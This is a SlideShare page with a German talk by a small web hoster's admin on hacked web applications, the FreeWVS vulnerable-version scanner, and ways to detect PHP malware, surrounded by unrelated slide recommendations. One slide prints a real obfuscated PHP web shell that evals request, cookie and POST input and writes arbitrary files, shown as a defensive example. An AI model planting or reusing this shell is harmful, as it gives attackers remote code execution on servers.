SlideShare une entreprise Scribd logo

Gehackte Webapplikationen und Malware

H
hannob

Beliebte Webanwendungen und Content-Management-Systeme haben regelmäßig Sicherheitslücken. Nutzer müssen diese Anwendungen regelmäßig updaten, aber viele Betreiber von Webseiten sind sich dessen nicht bewusst. Im Rahmen des Betriebs von Servern mit einigen Hundert Kunden habe ich das Tool FreeWVS entwickelt, mit dem sich Webanwendungen mit bekannten Sicherheitslücken erkennen lassen. Wenn man Updates versäumt, tauchen fast zwangsweise irgendwann gehackte Webanwendungen auf. Diese aufzuspüren ist aber nicht unbedingt trivial. Wenn es zu spät ist, wird der eigene Server unter Umständen zur Spamschleuder oder wird für DDoS-Attacken missbraucht.

Internet
1  sur  17
Télécharger pour lire hors ligne
Einleitung FreeWVS Gehackt Exkurs Ende Gehackte Webapplikationen und Malware Hanno B¨ock, Lizenz: CC0 / Public Domain 2014-04-11 Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
Einleitung FreeWVS Gehackt Exkurs Ende Vorstellung Beispiel Motivation Veraltete Webanwendungen Betreibe kleinen Webhoster (schokokeks.org), Fokus auf Datenschutz, Sicherheit, freie Software Zahlen: 2 Admins, ca. 300 Kunden, 1000 Domains, 1500 Web-Vhosts, 500 erkannte Webanwendungen Serverbetrieb f¨ur mich Nebenverdienst, hauptberuflich freier Journalist Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
Einleitung FreeWVS Gehackt Exkurs Ende Vorstellung Beispiel Motivation Veraltete Webanwendungen Your IP: x.x.x.x - Part of Ababil/”No Problem Bro” DDOS attack We are contacting you on behalf of [...]. They are currently under a DDOS attack, that is being perpetuated from this host on your network: x.x.x.x They have so far seen this much traffic coming from the node: 107576316 bytes 1453734 packets This is part of the Operation Ababil, or ”It’s OK, No Problem Bro”, DDOS attack that is being sent upon various financial institutions in the United States. Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
Einleitung FreeWVS Gehackt Exkurs Ende Vorstellung Beispiel Motivation Veraltete Webanwendungen Gehackte Webanwendungen bedeuten Streß - nicht nur f¨ur den Betreiber der Seite, sondern insbesondere auch f¨ur den Admin Serverlast steigt unerkl¨arlich Spam-Blacklisten ¨Ubergeordneter Provider beschwert sich und erwartet Reaktion Strafverfolgungsbeh¨orden (bei uns noch nie passiert) Brauchen Strategien f¨ur ganzen Server, nicht f¨ur einzelne Webseiten Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
Einleitung FreeWVS Gehackt Exkurs Ende Vorstellung Beispiel Motivation Veraltete Webanwendungen Konkretes Beispiel war ein Joomla 1.7.0, damals ca. 1 Jahr alt Derartige Vorkommnisse verst¨arkt seit etwa 2012, davor fast nie Alle(!) derartigen Ereignisse bei uns mit hoher Wahrscheinlichkeit aufgrund von veralteten Webanwendungen Fazit: Updaten bevor etwas passiert ist die beste Strategie Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
Einleitung FreeWVS Gehackt Exkurs Ende FreeWVS Schwierigkeiten beim Erkennen User informieren Entwicklung von FreeWVS Problem Webseiten heute FreeWVS erkennt Webanwendungen und Version auf Dateisystemebene Enth¨alt eine Datenbank mit jeweils letzter Sicherheitsl¨ucke (wenn m¨oglich CVE, sonst URL) und sicherer Version Unterscheidet nicht nach schwere der Sicherheitsl¨ucke, betrachtet nur jeweils j¨ungstes Problem Python, freie Software (CC0) https://source.schokokeks.org/freewvs/ Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
Einleitung FreeWVS Gehackt Exkurs Ende FreeWVS Schwierigkeiten beim Erkennen User informieren Entwicklung von FreeWVS Problem Webseiten heute Es gibt keine allgemeing¨ultige Strategie zum Erkennen von Webapps Versionsnummer nicht im Tarball, nur in Doku, nur gesplittet Seltsame Versionsnummernkonzepte (DokuWiki: 2013-12-08, auch schon gesehen: 1.2 neuer als 1.11) Oft unterschiedliche Erkennungsstrategien f¨ur unterschiedliche Major-Versionen Angenehm ist sowas: $wp version = ’3.8.2’; Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
Einleitung FreeWVS Gehackt Exkurs Ende FreeWVS Schwierigkeiten beim Erkennen User informieren Entwicklung von FreeWVS Problem Webseiten heute User k¨onnen sich wahlweise t¨aglich, w¨ochentlich oder monatlich informieren lassen Nicht abschaltbar! Problem: Wird h¨aufig ignoriert Vielen Usern nicht klar dass Webanwendungen betreut werden m¨ussen Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
Einleitung FreeWVS Gehackt Exkurs Ende FreeWVS Schwierigkeiten beim Erkennen User informieren Entwicklung von FreeWVS Problem Webseiten heute Bislang fast nur intern entwickelt, wenig Feedback von extern Update-Mechanismus nicht optimal (im Moment: svn up; make install) K¨onnten viel mehr Webanwendungen aufnehmen, insbesondere Plugins Patches welcome! Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
Einleitung FreeWVS Gehackt Exkurs Ende FreeWVS Schwierigkeiten beim Erkennen User informieren Entwicklung von FreeWVS Problem Webseiten heute Fr¨uher: Webdesigner erstellt HTML-Seite Zwischendurch: Webdesigner erstellt PHP Heute: Webdesigner erstellt Theme f¨ur einfach zu bedienende, kostenlose Webanwendungen Problem: Wer k¨ummert sich um Updates? Oft: Niemand L¨osung manchmal: HTML-Dump von CMS Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
Einleitung FreeWVS Gehackt Exkurs Ende Wenn es zu sp¨at ist PHP-Shell Von Hand erkennen Malware erkennen Offene Fragen Bei uns bislang keine Defacements via SQL-Injection oder geklauten Zugangsdaten beobachtet (wir benutzen schon immer SFTP) Nur: Spam, DDoS-Attacken und (am h¨aufigsten) abgelegte PHP-Shells Oft: Grund f¨ur Angriff unklar, PHP-Shell ”f¨ur sp¨ater” Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
Einleitung FreeWVS Gehackt Exkurs Ende Wenn es zu sp¨at ist PHP-Shell Von Hand erkennen Malware erkennen Offene Fragen $huqcyw = ”777564599393bc96823bdf64b6f221d5”; if(isset($ REQUEST[’epji’])) { $kumwnkyc = $ REQUEST[’epji’]; eval($kumwnkyc); exit(); } if(isset($ REQUEST[’qfwdstnd’])) { $rpjvrsf = $ REQUEST[’wuefsoa’]; $kopi = $ REQUEST[’qfwdstnd’]; $mzwjcpc = fopen($kopi, ’w’); $sshhbcz = fwrite($mzwjcpc, $rpjvrsf); fclose($mzwjcpc); echo $sshhbcz; exit(); eval ( base64 decode (”IGlmICggaXNz- ZXQoICRfQ09PS0lFWydkd2MnXSkgKSB7IGVjaG8gJzxjd2Q+ JyAuIGdldGN3ZCgpIC4gJzwvY3dkPic7IH0gaWYgKCBpc3Nld CAoICRfUE9TVFsncGU4MCddICkgKSB7IGV2YWwgKCBiYXNlNj RfZGVjb2RlICggJF9QT1NUWydwZTgwJ10gKSApOyByZXR1cm4 7IH0gIGlmICggaXNzZXQoICRfQ09PS0lFWydwZTgwJ10pICkg eyBldmFsICggYmFzZTY0X2RlY29kZSAoICRfQ09PS0lFWydwZ TgwJ10gKSApOyByZXR1cm47IH0g”) ); } Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
Einleitung FreeWVS Gehackt Exkurs Ende Wenn es zu sp¨at ist PHP-Shell Von Hand erkennen Malware erkennen Offene Fragen Kombinationen aus eval, gzinflate, base64 decode und ¨ahnlichem Problem: Oft auch sowas in legitimem PHP-Code (oft Themes) als Code-Obfuscation Decodieren: eval durch echo ersetzen Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
Einleitung FreeWVS Gehackt Exkurs Ende Wenn es zu sp¨at ist PHP-Shell Von Hand erkennen Malware erkennen Offene Fragen Webroots mit ClamAV scannen - erkennt viel, aber l¨angst nicht alles LinuxMalwareDetect (maldet) - etwas umst¨andlich in der Bedienung, aber erkennt einiges Auch einige propriet¨are Virenscanner f¨ur Linux verf¨ugbar, kostenlos meist nur zum privatgebrauch Problem: Erkennungsrate praktisch immer unter 50 % Erstes Codebeispiel von vorhin: damals 0 auf Virustotal, jetzt 1/51 Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
Einleitung FreeWVS Gehackt Exkurs Ende Wenn es zu sp¨at ist PHP-Shell Von Hand erkennen Malware erkennen Offene Fragen Strategien zur generischen Erkennung von PHP-Shells? Sollte nicht zu schwer sein, kenne aber keine Software. Wie / an wen Malware am besten reporten? Erkennen von Hacks in Form von Datenbankeintr¨agen / Artikeln / Defacements? Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
Einleitung FreeWVS Gehackt Exkurs Ende Sichere Webanwendungen Wenn ihr Webanwendungen programmiert: Benutzt Prepared Statements und Content Security Policy! Konsequent eingesetzt verhindern Prepared Statements alle SQL-Injections und Content Security Policy alle Cross Site Scripting-Fehler - Großteil aller Web-Vulnerabilities Fehlerklassen verhindern statt einzelne Fehler Aber: H¨atte in meisten F¨allen bei uns vermutlich nichts gen¨utzt (Probleme mit File Upload oder Remote Code Execution) Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
Einleitung FreeWVS Gehackt Exkurs Ende Schlussfolgerung Ein Großteil der Angriffe l¨asst sich durch aktuelle Software verhindern Angriffe verhindern ist immer besser als Angriffe sp¨ater erkennen M¨oglichkeiten angegriffene Webseiten zu finden unzuverl¨assig und unbefriedigend Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware

Recommandé

Franquicias de alitas
Franquicias de alitasFranquicias de alitas
Franquicias de alitasjopps999
 
Die Online-Rechnungswesen- Management-Suite für das CODO Netzwerk
Die Online-Rechnungswesen- Management-Suite für das CODO NetzwerkDie Online-Rechnungswesen- Management-Suite für das CODO Netzwerk
Die Online-Rechnungswesen- Management-Suite für das CODO NetzwerkAlex King
 
Familien-Gründung und Karriere
Familien-Gründung und KarriereFamilien-Gründung und Karriere
Familien-Gründung und Karriereaccess KellyOCG GmbH
 
Women in Technology Event 2013
Women in Technology Event 2013Women in Technology Event 2013
Women in Technology Event 2013access KellyOCG GmbH
 
FanatischeFlintenweiber kleemola
FanatischeFlintenweiber kleemolaFanatischeFlintenweiber kleemola
FanatischeFlintenweiber kleemolaheckerstampehl
 
Las drogas en los jovenes
Las drogas en los jovenesLas drogas en los jovenes
Las drogas en los jovenesRosario Martinez Nava
 
Müller Milch
Müller MilchMüller Milch
Müller MilchKlaus Schwickert
 
COSO.
COSO.COSO.
COSO.XiomRoguez
 

Recommandé

Franquicias de alitas
Franquicias de alitasFranquicias de alitas
Franquicias de alitasjopps999
 
Die Online-Rechnungswesen- Management-Suite für das CODO Netzwerk
Die Online-Rechnungswesen- Management-Suite für das CODO NetzwerkDie Online-Rechnungswesen- Management-Suite für das CODO Netzwerk
Die Online-Rechnungswesen- Management-Suite für das CODO NetzwerkAlex King
 
Familien-Gründung und Karriere
Familien-Gründung und KarriereFamilien-Gründung und Karriere
Familien-Gründung und Karriereaccess KellyOCG GmbH
 
Women in Technology Event 2013
Women in Technology Event 2013Women in Technology Event 2013
Women in Technology Event 2013access KellyOCG GmbH
 
FanatischeFlintenweiber kleemola
FanatischeFlintenweiber kleemolaFanatischeFlintenweiber kleemola
FanatischeFlintenweiber kleemolaheckerstampehl
 
Las drogas en los jovenes
Las drogas en los jovenesLas drogas en los jovenes
Las drogas en los jovenesRosario Martinez Nava
 
Müller Milch
Müller MilchMüller Milch
Müller MilchKlaus Schwickert
 
COSO.
COSO.COSO.
COSO.XiomRoguez
 
Los métodos anticonceptivos
Los métodos anticonceptivosLos métodos anticonceptivos
Los métodos anticonceptivos98111704007
 
Chancen und Herausforderungen von Social Media für Ihr Business
Chancen und Herausforderungen von Social Media für Ihr BusinessChancen und Herausforderungen von Social Media für Ihr Business
Chancen und Herausforderungen von Social Media für Ihr BusinessFabian Kehle
 
PUEBLOS MAGICOS *ZACATLAN DE LAS MANZANAS*
PUEBLOS MAGICOS *ZACATLAN DE LAS MANZANAS*PUEBLOS MAGICOS *ZACATLAN DE LAS MANZANAS*
PUEBLOS MAGICOS *ZACATLAN DE LAS MANZANAS*Jazmiin De Santiiago
 
Historia del software libre
Historia del software libreHistoria del software libre
Historia del software libreMari Oviedo
 
Las drogas en los jovenes
Las drogas en los jovenesLas drogas en los jovenes
Las drogas en los jovenesRosario Martinez Nava
 
Gründerplus Vorstellung
Gründerplus VorstellungGründerplus Vorstellung
Gründerplus VorstellungGründerplus
 
01_imosAG_ProfFrankPrekwinkel
01_imosAG_ProfFrankPrekwinkel01_imosAG_ProfFrankPrekwinkel
01_imosAG_ProfFrankPrekwinkelClarionGermany
 
Produkt Vorschau Frühling 2012
Produkt Vorschau Frühling 2012Produkt Vorschau Frühling 2012
Produkt Vorschau Frühling 2012Hudson Reed
 
Computación básica
Computación básicaComputación básica
Computación básicaplfaster
 
Verbier
VerbierVerbier
Verbierflorencesupper
 
Facebook Alben auf der eigenen Website mit Composite C1 darstellen
Facebook Alben auf der eigenen Website mit Composite C1 darstellenFacebook Alben auf der eigenen Website mit Composite C1 darstellen
Facebook Alben auf der eigenen Website mit Composite C1 darstellenCGN Cloud Company
 
historia del internet
historia del internet historia del internet
historia del internet Mari Oviedo
 
tarea 3.lider de mesa de ayuda
tarea 3.lider de mesa de ayudatarea 3.lider de mesa de ayuda
tarea 3.lider de mesa de ayudauziasuzias
 
Die Eco Brands kommen
Die Eco Brands kommenDie Eco Brands kommen
Die Eco Brands kommenStephanie Hartung
 
Jessica galindez
Jessica galindezJessica galindez
Jessica galindezjessialexg
 
Farándula ecuatoriana actualizada
Farándula ecuatoriana actualizadaFarándula ecuatoriana actualizada
Farándula ecuatoriana actualizadaMishel Lizalde
 
BewerbungStipendium
BewerbungStipendiumBewerbungStipendium
BewerbungStipendiumFunshy
 
Bstographia
BstographiaBstographia
BstographiaBoris Gurevich
 
EMarCon VHS Erfolgreiche Strategien für Ihre Fanseite
EMarCon VHS Erfolgreiche Strategien für Ihre FanseiteEMarCon VHS Erfolgreiche Strategien für Ihre Fanseite
EMarCon VHS Erfolgreiche Strategien für Ihre FanseiteJosef Rankl | Der Social Media Berater | EMarCon
 
NETFOX Admin-Treff: Penetration Testing II
NETFOX Admin-Treff: Penetration Testing IINETFOX Admin-Treff: Penetration Testing II
NETFOX Admin-Treff: Penetration Testing IINETFOX AG
 
Microsoft Cyber Security IT-Camp
Microsoft Cyber Security IT-CampMicrosoft Cyber Security IT-Camp
Microsoft Cyber Security IT-CampAlexander Benoit
 
Webanwendungen - Installation, Konfiguration und Administration
Webanwendungen - Installation, Konfiguration und AdministrationWebanwendungen - Installation, Konfiguration und Administration
Webanwendungen - Installation, Konfiguration und AdministrationThomas Siegers
 

Contenu connexe

En vedette

Los métodos anticonceptivos
Los métodos anticonceptivosLos métodos anticonceptivos
Los métodos anticonceptivos98111704007
 
Chancen und Herausforderungen von Social Media für Ihr Business
Chancen und Herausforderungen von Social Media für Ihr BusinessChancen und Herausforderungen von Social Media für Ihr Business
Chancen und Herausforderungen von Social Media für Ihr BusinessFabian Kehle
 
PUEBLOS MAGICOS *ZACATLAN DE LAS MANZANAS*
PUEBLOS MAGICOS *ZACATLAN DE LAS MANZANAS*PUEBLOS MAGICOS *ZACATLAN DE LAS MANZANAS*
PUEBLOS MAGICOS *ZACATLAN DE LAS MANZANAS*Jazmiin De Santiiago
 
Historia del software libre
Historia del software libreHistoria del software libre
Historia del software libreMari Oviedo
 
Gründerplus Vorstellung
Gründerplus VorstellungGründerplus Vorstellung
Gründerplus VorstellungGründerplus
 
01_imosAG_ProfFrankPrekwinkel
01_imosAG_ProfFrankPrekwinkel01_imosAG_ProfFrankPrekwinkel
01_imosAG_ProfFrankPrekwinkelClarionGermany
 
Produkt Vorschau Frühling 2012
Produkt Vorschau Frühling 2012Produkt Vorschau Frühling 2012
Produkt Vorschau Frühling 2012Hudson Reed
 
Computación básica
Computación básicaComputación básica
Computación básicaplfaster
 
Facebook Alben auf der eigenen Website mit Composite C1 darstellen
Facebook Alben auf der eigenen Website mit Composite C1 darstellenFacebook Alben auf der eigenen Website mit Composite C1 darstellen
Facebook Alben auf der eigenen Website mit Composite C1 darstellenCGN Cloud Company
 
historia del internet
historia del internet historia del internet
historia del internet Mari Oviedo
 
tarea 3.lider de mesa de ayuda
tarea 3.lider de mesa de ayudatarea 3.lider de mesa de ayuda
tarea 3.lider de mesa de ayudauziasuzias
 
Jessica galindez
Jessica galindezJessica galindez
Jessica galindezjessialexg
 
Farándula ecuatoriana actualizada
Farándula ecuatoriana actualizadaFarándula ecuatoriana actualizada
Farándula ecuatoriana actualizadaMishel Lizalde
 
BewerbungStipendium
BewerbungStipendiumBewerbungStipendium
BewerbungStipendiumFunshy
 

En vedette (19)

Los métodos anticonceptivos
Los métodos anticonceptivosLos métodos anticonceptivos
Los métodos anticonceptivos
 
Chancen und Herausforderungen von Social Media für Ihr Business
Chancen und Herausforderungen von Social Media für Ihr BusinessChancen und Herausforderungen von Social Media für Ihr Business
Chancen und Herausforderungen von Social Media für Ihr Business
 
PUEBLOS MAGICOS *ZACATLAN DE LAS MANZANAS*
PUEBLOS MAGICOS *ZACATLAN DE LAS MANZANAS*PUEBLOS MAGICOS *ZACATLAN DE LAS MANZANAS*
PUEBLOS MAGICOS *ZACATLAN DE LAS MANZANAS*
 
Historia del software libre
Historia del software libreHistoria del software libre
Historia del software libre
 
Las drogas en los jovenes
Las drogas en los jovenesLas drogas en los jovenes
Las drogas en los jovenes
 
Gründerplus Vorstellung
Gründerplus VorstellungGründerplus Vorstellung
Gründerplus Vorstellung
 
01_imosAG_ProfFrankPrekwinkel
01_imosAG_ProfFrankPrekwinkel01_imosAG_ProfFrankPrekwinkel
01_imosAG_ProfFrankPrekwinkel
 
Produkt Vorschau Frühling 2012
Produkt Vorschau Frühling 2012Produkt Vorschau Frühling 2012
Produkt Vorschau Frühling 2012
 
Computación básica
Computación básicaComputación básica
Computación básica
 
Verbier
VerbierVerbier
Verbier
 
Facebook Alben auf der eigenen Website mit Composite C1 darstellen
Facebook Alben auf der eigenen Website mit Composite C1 darstellenFacebook Alben auf der eigenen Website mit Composite C1 darstellen
Facebook Alben auf der eigenen Website mit Composite C1 darstellen
 
historia del internet
historia del internet historia del internet
historia del internet
 
tarea 3.lider de mesa de ayuda
tarea 3.lider de mesa de ayudatarea 3.lider de mesa de ayuda
tarea 3.lider de mesa de ayuda
 
Die Eco Brands kommen
Die Eco Brands kommenDie Eco Brands kommen
Die Eco Brands kommen
 
Jessica galindez
Jessica galindezJessica galindez
Jessica galindez
 
Farándula ecuatoriana actualizada
Farándula ecuatoriana actualizadaFarándula ecuatoriana actualizada
Farándula ecuatoriana actualizada
 
BewerbungStipendium
BewerbungStipendiumBewerbungStipendium
BewerbungStipendium
 
Bstographia
BstographiaBstographia
Bstographia
 
EMarCon VHS Erfolgreiche Strategien für Ihre Fanseite
EMarCon VHS Erfolgreiche Strategien für Ihre FanseiteEMarCon VHS Erfolgreiche Strategien für Ihre Fanseite
EMarCon VHS Erfolgreiche Strategien für Ihre Fanseite
 

Similaire à Gehackte Webapplikationen und Malware

NETFOX Admin-Treff: Penetration Testing II
NETFOX Admin-Treff: Penetration Testing IINETFOX Admin-Treff: Penetration Testing II
NETFOX Admin-Treff: Penetration Testing IINETFOX AG
 
Microsoft Cyber Security IT-Camp
Microsoft Cyber Security IT-CampMicrosoft Cyber Security IT-Camp
Microsoft Cyber Security IT-CampAlexander Benoit
 
Webanwendungen - Installation, Konfiguration und Administration
Webanwendungen - Installation, Konfiguration und AdministrationWebanwendungen - Installation, Konfiguration und Administration
Webanwendungen - Installation, Konfiguration und AdministrationThomas Siegers
 
Open Source und Free Software unter Windows
Open Source und Free Software unter WindowsOpen Source und Free Software unter Windows
Open Source und Free Software unter WindowsMartin Leyrer
 
WordPress Sicherheit
WordPress SicherheitWordPress Sicherheit
WordPress SicherheitDietmar Leher
 
10 Stunden / 5 Massnahmen: Sicherheit einer Web App erhöhen
10 Stunden / 5 Massnahmen: Sicherheit einer Web App erhöhen10 Stunden / 5 Massnahmen: Sicherheit einer Web App erhöhen
10 Stunden / 5 Massnahmen: Sicherheit einer Web App erhöhenDietrichRordorf
 
Opensource fuer Bibliotheken
Opensource fuer BibliothekenOpensource fuer Bibliotheken
Opensource fuer BibliothekenLuka Peters
 
WordPress CMS - WebMontag Chemnitz Oktober 2011
WordPress CMS - WebMontag Chemnitz Oktober 2011WordPress CMS - WebMontag Chemnitz Oktober 2011
WordPress CMS - WebMontag Chemnitz Oktober 2011David Decker
 
Datensicherung WordPress
Datensicherung WordPressDatensicherung WordPress
Datensicherung WordPressJoachim Hummel
 
High Security PHP Applications
High Security PHP ApplicationsHigh Security PHP Applications
High Security PHP Applicationsguest0e6d5e
 
JavaScript Days 2015: Security
JavaScript Days 2015: SecurityJavaScript Days 2015: Security
JavaScript Days 2015: SecurityMayflower GmbH
 
Web 2.0 in und für Bibliotheken
Web 2.0 in und für BibliothekenWeb 2.0 in und für Bibliotheken
Web 2.0 in und für BibliothekenChristian Hauschke
 
Top 10 Internet Trends 2005
Top 10 Internet Trends 2005Top 10 Internet Trends 2005
Top 10 Internet Trends 2005Jürg Stuker
 
5.1 freigeben von codeausschnitten
5.1 freigeben von codeausschnitten5.1 freigeben von codeausschnitten
5.1 freigeben von codeausschnittenMichael Konzett
 
DDEV - Eine lokale Entwicklungsumgebung
DDEV - Eine lokale EntwicklungsumgebungDDEV - Eine lokale Entwicklungsumgebung
DDEV - Eine lokale EntwicklungsumgebungFrank Schmittlein
 
Die Gefahr Im Web
Die Gefahr Im WebDie Gefahr Im Web
Die Gefahr Im WebC0pa
 
Open S U S E Conference Involved F O S S
Open S U S E Conference Involved F O S SOpen S U S E Conference Involved F O S S
Open S U S E Conference Involved F O S SSascha Manns
 
Ueberlegungen Projektmanagement Web Applications
Ueberlegungen Projektmanagement Web ApplicationsUeberlegungen Projektmanagement Web Applications
Ueberlegungen Projektmanagement Web ApplicationsGünther Haslbeck
 

Similaire à Gehackte Webapplikationen und Malware (20)

NETFOX Admin-Treff: Penetration Testing II
NETFOX Admin-Treff: Penetration Testing IINETFOX Admin-Treff: Penetration Testing II
NETFOX Admin-Treff: Penetration Testing II
 
Microsoft Cyber Security IT-Camp
Microsoft Cyber Security IT-CampMicrosoft Cyber Security IT-Camp
Microsoft Cyber Security IT-Camp
 
Webanwendungen - Installation, Konfiguration und Administration
Webanwendungen - Installation, Konfiguration und AdministrationWebanwendungen - Installation, Konfiguration und Administration
Webanwendungen - Installation, Konfiguration und Administration
 
Open Source und Free Software unter Windows
Open Source und Free Software unter WindowsOpen Source und Free Software unter Windows
Open Source und Free Software unter Windows
 
WordPress Sicherheit
WordPress SicherheitWordPress Sicherheit
WordPress Sicherheit
 
10 Stunden / 5 Massnahmen: Sicherheit einer Web App erhöhen
10 Stunden / 5 Massnahmen: Sicherheit einer Web App erhöhen10 Stunden / 5 Massnahmen: Sicherheit einer Web App erhöhen
10 Stunden / 5 Massnahmen: Sicherheit einer Web App erhöhen
 
Opensource fuer Bibliotheken
Opensource fuer BibliothekenOpensource fuer Bibliotheken
Opensource fuer Bibliotheken
 
WordPress CMS - WebMontag Chemnitz Oktober 2011
WordPress CMS - WebMontag Chemnitz Oktober 2011WordPress CMS - WebMontag Chemnitz Oktober 2011
WordPress CMS - WebMontag Chemnitz Oktober 2011
 
Joomla
JoomlaJoomla
Joomla
 
Datensicherung WordPress
Datensicherung WordPressDatensicherung WordPress
Datensicherung WordPress
 
Ec2009 Templates
Ec2009 TemplatesEc2009 Templates
Ec2009 Templates
 
High Security PHP Applications
High Security PHP ApplicationsHigh Security PHP Applications
High Security PHP Applications
 
JavaScript Days 2015: Security
JavaScript Days 2015: SecurityJavaScript Days 2015: Security
JavaScript Days 2015: Security
 
Web 2.0 in und für Bibliotheken
Web 2.0 in und für BibliothekenWeb 2.0 in und für Bibliotheken
Web 2.0 in und für Bibliotheken
 
Top 10 Internet Trends 2005
Top 10 Internet Trends 2005Top 10 Internet Trends 2005
Top 10 Internet Trends 2005
 
5.1 freigeben von codeausschnitten
5.1 freigeben von codeausschnitten5.1 freigeben von codeausschnitten
5.1 freigeben von codeausschnitten
 
DDEV - Eine lokale Entwicklungsumgebung
DDEV - Eine lokale EntwicklungsumgebungDDEV - Eine lokale Entwicklungsumgebung
DDEV - Eine lokale Entwicklungsumgebung
 
Die Gefahr Im Web
Die Gefahr Im WebDie Gefahr Im Web
Die Gefahr Im Web
 
Open S U S E Conference Involved F O S S
Open S U S E Conference Involved F O S SOpen S U S E Conference Involved F O S S
Open S U S E Conference Involved F O S S
 
Ueberlegungen Projektmanagement Web Applications
Ueberlegungen Projektmanagement Web ApplicationsUeberlegungen Projektmanagement Web Applications
Ueberlegungen Projektmanagement Web Applications
 

Plus de hannob

The Fuzzing Project - 32C3
The Fuzzing Project - 32C3The Fuzzing Project - 32C3
The Fuzzing Project - 32C3hannob
 
TLS Interception considered harmful (Chaos Communication Camp 2015)
TLS Interception considered harmful (Chaos Communication Camp 2015)TLS Interception considered harmful (Chaos Communication Camp 2015)
TLS Interception considered harmful (Chaos Communication Camp 2015)hannob
 
Some tales about TLS
Some tales about TLSSome tales about TLS
Some tales about TLShannob
 
Crypto workshop part 3 - Don't do this yourself
Crypto workshop part 3 - Don't do this yourselfCrypto workshop part 3 - Don't do this yourself
Crypto workshop part 3 - Don't do this yourselfhannob
 
Crypto workshop part 1 - Web and Crypto
Crypto workshop part 1 - Web and CryptoCrypto workshop part 1 - Web and Crypto
Crypto workshop part 1 - Web and Cryptohannob
 
How broken is TLS?
How broken is TLS?How broken is TLS?
How broken is TLS?hannob
 
Papierlos
PapierlosPapierlos
Papierloshannob
 
SSL, X.509, HTTPS - How to configure your HTTPS server
SSL, X.509, HTTPS - How to configure your HTTPS serverSSL, X.509, HTTPS - How to configure your HTTPS server
SSL, X.509, HTTPS - How to configure your HTTPS serverhannob
 
Stromsparen
StromsparenStromsparen
Stromsparenhannob
 
Wirtschaftswachstum, klimawandel und Peak Oil
Wirtschaftswachstum, klimawandel und Peak OilWirtschaftswachstum, klimawandel und Peak Oil
Wirtschaftswachstum, klimawandel und Peak Oilhannob
 

Plus de hannob (10)

The Fuzzing Project - 32C3
The Fuzzing Project - 32C3The Fuzzing Project - 32C3
The Fuzzing Project - 32C3
 
TLS Interception considered harmful (Chaos Communication Camp 2015)
TLS Interception considered harmful (Chaos Communication Camp 2015)TLS Interception considered harmful (Chaos Communication Camp 2015)
TLS Interception considered harmful (Chaos Communication Camp 2015)
 
Some tales about TLS
Some tales about TLSSome tales about TLS
Some tales about TLS
 
Crypto workshop part 3 - Don't do this yourself
Crypto workshop part 3 - Don't do this yourselfCrypto workshop part 3 - Don't do this yourself
Crypto workshop part 3 - Don't do this yourself
 
Crypto workshop part 1 - Web and Crypto
Crypto workshop part 1 - Web and CryptoCrypto workshop part 1 - Web and Crypto
Crypto workshop part 1 - Web and Crypto
 
How broken is TLS?
How broken is TLS?How broken is TLS?
How broken is TLS?
 
Papierlos
PapierlosPapierlos
Papierlos
 
SSL, X.509, HTTPS - How to configure your HTTPS server
SSL, X.509, HTTPS - How to configure your HTTPS serverSSL, X.509, HTTPS - How to configure your HTTPS server
SSL, X.509, HTTPS - How to configure your HTTPS server
 
Stromsparen
StromsparenStromsparen
Stromsparen
 
Wirtschaftswachstum, klimawandel und Peak Oil
Wirtschaftswachstum, klimawandel und Peak OilWirtschaftswachstum, klimawandel und Peak Oil
Wirtschaftswachstum, klimawandel und Peak Oil
 

Gehackte Webapplikationen und Malware

  • 1. Einleitung FreeWVS Gehackt Exkurs Ende Gehackte Webapplikationen und Malware Hanno B¨ock, Lizenz: CC0 / Public Domain 2014-04-11 Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  • 2. Einleitung FreeWVS Gehackt Exkurs Ende Vorstellung Beispiel Motivation Veraltete Webanwendungen Betreibe kleinen Webhoster (schokokeks.org), Fokus auf Datenschutz, Sicherheit, freie Software Zahlen: 2 Admins, ca. 300 Kunden, 1000 Domains, 1500 Web-Vhosts, 500 erkannte Webanwendungen Serverbetrieb f¨ur mich Nebenverdienst, hauptberuflich freier Journalist Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  • 3. Einleitung FreeWVS Gehackt Exkurs Ende Vorstellung Beispiel Motivation Veraltete Webanwendungen Your IP: x.x.x.x - Part of Ababil/”No Problem Bro” DDOS attack We are contacting you on behalf of [...]. They are currently under a DDOS attack, that is being perpetuated from this host on your network: x.x.x.x They have so far seen this much traffic coming from the node: 107576316 bytes 1453734 packets This is part of the Operation Ababil, or ”It’s OK, No Problem Bro”, DDOS attack that is being sent upon various financial institutions in the United States. Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  • 4. Einleitung FreeWVS Gehackt Exkurs Ende Vorstellung Beispiel Motivation Veraltete Webanwendungen Gehackte Webanwendungen bedeuten Streß - nicht nur f¨ur den Betreiber der Seite, sondern insbesondere auch f¨ur den Admin Serverlast steigt unerkl¨arlich Spam-Blacklisten ¨Ubergeordneter Provider beschwert sich und erwartet Reaktion Strafverfolgungsbeh¨orden (bei uns noch nie passiert) Brauchen Strategien f¨ur ganzen Server, nicht f¨ur einzelne Webseiten Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
